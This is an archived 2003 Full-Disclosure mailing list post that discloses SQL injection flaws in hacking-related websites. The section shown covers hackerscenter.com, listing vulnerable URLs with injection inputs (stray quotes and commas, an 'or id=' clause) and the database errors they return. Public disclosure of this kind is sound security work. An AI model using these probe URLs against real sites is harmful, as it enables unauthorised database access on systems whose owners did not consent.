From: Sir Mordred (mordred@s-mail.com)
To: full-disclosure@lists.netsys.com
Date: Mon, 05 May 2003 15:58:59 +0000
Subject: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites


// @(#)Mordred Labs security notice - exploring the hacking websites

Release date: May 5, 2003
Author: Sir Mordred (mordred@s-mail.com)

I. INTRODUCTION

It is a first security notice about the real state of web app security  
with the real world examples. In this issue we will be focusing on websites
related to hacking.
Security companies and news portals will be discussed later.
For now, it would be nice to see the reaction of the community on this
issue.

Looking at this notice, one can clearly see, that the combination of
ASP/PHP and relational database 
is a very dangerous, even the "security experts" make mistakes :-).

Surely, not all of the vulnerabilities have been found/disclosed. 
For example, there was no testing for CSS vulnerabilities at all.

Note that the vulnerabilities are presented here in the following format:

* ISSUE  - description of the vulnerability
blank line the url to demonstrate this vulnerability
blank line the error message (if exists)

One last word to tripz: thanks for the help.

II. DETAILS


[snip...]


3) ---------------------- www.hackerscenter.com -----------------------
The best resource for hackers and crackers: tons of tools, tutorials, books, articles, analysis. Join our Top%0 or enjoy our Online tools!!!
* ISSUE 1 - SQL injection in /top50/default.asp page

http://www.hackerscenter.com/top50/default.asp?id=9,'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=9,''.
/top50/default.asp, line 249

* ISSUE 2 - SQL injection in /downloads/download.asp page

http://www.hackerscenter.com/downloads/download.asp?id=7,&area=HACKING

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=7,'.
/downloads/download.asp, line 37

* ISSUE 3 - SQL injection in /articles/article.asp page

Visiting the url http://www.hackerscenter.com/articles/article.asp?id=28
gives us back their article "Securing Windows". 

However, visiting the url
http://www.hackerscenter.com/articles/article.asp?id=28111 
gives us back the error page with the message "Exception occured in
/articles/article.asp, line 129".

But visiting
http://www.hackerscenter.com/articles/article.asp?id=28111+or+id=28 gives
us the above article.

* ISSUE 4 - SQL injection in /articles/archive.asp

http://www.hackerscenter.com/articles/archive.asp?searchstring=SQL&field='SU
BJECT

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression
'Validated=True AND 'SUBJECT LIKE '%%%SQL%%%' ORDER BY 'SUBJECT DESC'.
/articles/archive.asp, line 154


[snip...]




main page ATTRITION feedback